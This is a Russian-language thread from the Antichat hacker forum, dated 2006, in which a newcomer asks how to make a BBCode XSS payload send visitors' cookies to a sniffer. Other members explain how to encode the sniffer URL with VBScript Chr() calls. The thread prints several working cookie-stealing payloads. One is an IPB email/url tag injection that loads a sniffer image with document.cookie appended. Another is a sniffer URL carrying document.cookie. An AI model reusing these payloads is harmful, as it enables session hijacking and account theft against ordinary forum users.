ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как в такой XSS указать путь к античтовскому снифферу?
  #1  
Старый 25.02.2006, 15:15
Аватар для Vovec
Vovec
Новичок
Регистрация: 31.08.2005
Сообщений: 27
Провел на форуме:
50859

Репутация: 3
По умолчанию Как в такой XSS указать путь к античтовскому снифферу?

Помогите перваку, как в такой XSS
Код HTML:
 [color=FFFFFF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color]
указать путь к античатовскому снифферу. Вопрос лажовый, думаю вам ответить на него пару пустяков...

Последний раз редактировалось Vovec; 25.02.2006 в 18:19..
 
Ответить с цитированием

  #2  
Старый 25.02.2006, 15:35
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Цитата:
Сообщение от Vovec  
Помогите перваку, как в такой XSS [color=FFFFFF;background:url(vbscript:location.repl ace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr( 102)+document.cookie))]a[/color] [/HTML] указать путь к античатовскому снифферу. Вопрос лажовый, думаю вам ответить на него пару пустяков...
И как ты предстовляеш себе реализаию XSS с элементами C++ если я не ошибаюсь ???
 
Ответить с цитированием

  #3  
Старый 25.02.2006, 16:37
Аватар для Electro
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию

Я ничё не понял
 
Ответить с цитированием

  #4  
Старый 25.02.2006, 16:55
Аватар для vectorg
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

там vbscript, а Chr( ) это встроенная функция, возвращающая символ, имеющий заданный код ASCII

коды ASCII - http://electronics.sortos.ru/docs/ascii_table.html

составляешь цепочку из Chr() где и будет твой код сниффера и не забудь пробел убрать ("repl ace" -> "replace")



незабудь про ±

Последний раз редактировалось VectorG; 25.02.2006 в 16:58..
 
Ответить с цитированием

  #5  
Старый 25.02.2006, 17:38
Аватар для Meister
Meister
Участник форума
Регистрация: 13.10.2005
Сообщений: 210
Провел на форуме:
371736

Репутация: 14
По умолчанию

все ответили так же как и я только у меня у одного пост удалили почему-то.
 
Ответить с цитированием

  #6  
Старый 25.02.2006, 18:31
Аватар для Vovec
Vovec
Новичок
Регистрация: 31.08.2005
Сообщений: 27
Провел на форуме:
50859

Репутация: 3
По умолчанию

VectorG я то тебе + могу поставить, мне ни жалко...Только я ничерта не понял, как должна быть выгледеть это цепочка, чтоб в ней был код сниффера...
Попробую спросить вас по другому, что мне надо добавить в этот XSS, чтоб после его, размешенния куки пользователей приходили на сниффер.
Вот например после размешенния вот такой XSS
Код HTML:
[em*ail]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://site/snif.jpg?"+document.cookie);`
на IPB мне сливаються куки. Вот как в той XSS реализовать это, если это вообще возможно?
 
Ответить с цитированием

  #7  
Старый 26.02.2006, 00:05
Аватар для Vovec
Vovec
Новичок
Регистрация: 31.08.2005
Сообщений: 27
Провел на форуме:
50859

Репутация: 3
По умолчанию

VectorG я понял так твой пост...
Если URL к снифферу будет выглядить например вот так "http://site/snif.php" то мне надо в скобки Chr вставлять каждый символ URL'а , тоесть например http должно выглядить так, к примеру по коду Decimal из таблицы ASCII

Код:
Chr(104)+Chr(116)+Chr(116)+Chr(112)
Я правильно понял? Если нет, то ни мог бы ты поконкретний объяснить?

Последний раз редактировалось Vovec; 26.02.2006 в 04:08..
 
Ответить с цитированием

  #8  
Старый 26.02.2006, 17:34
Аватар для Xex
Xex
Banned
Регистрация: 10.07.2005
Сообщений: 224
Провел на форуме:
1062041

Репутация: 50
По умолчанию

To Vovec: ты прально понял...
 
Ответить с цитированием

  #9  
Старый 27.02.2006, 02:50
Аватар для podkashey
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию

Vovec, а в чем вопрос? тебе дали таблицу аски. Ты хочешь, чтобы тебе перевели http://site/snif.php к виду chr()? Ну тогда предоставь полный адрес снифера. И то не знаю есть ли здесь альтруисты...
 
Ответить с цитированием

  #10  
Старый 27.02.2006, 05:06
Аватар для Vovec
Vovec
Новичок
Регистрация: 31.08.2005
Сообщений: 27
Провел на форуме:
50859

Репутация: 3
По умолчанию

podkashey да не, я всё что к чему уже понял, сначало просто не догнал.Только есть ещё вапросы, на которые я надеюсь вы дадите ответы. Если я укажу URL каторый я указал ниже, в кодах ACSII к примеру,то он будет работать или я его не правильно сформировал? И ещё вопрос, в коды ACSII надо загонять только URL, или также всё что идёт после s.jpg
Код:
http://antichat.ru/cgi-bin/s.jpg?+document.cookie
Больше негде спросить, кроме как у вас...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Путь война!!! Китежанин Болталка 3 25.03.2005 06:12



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ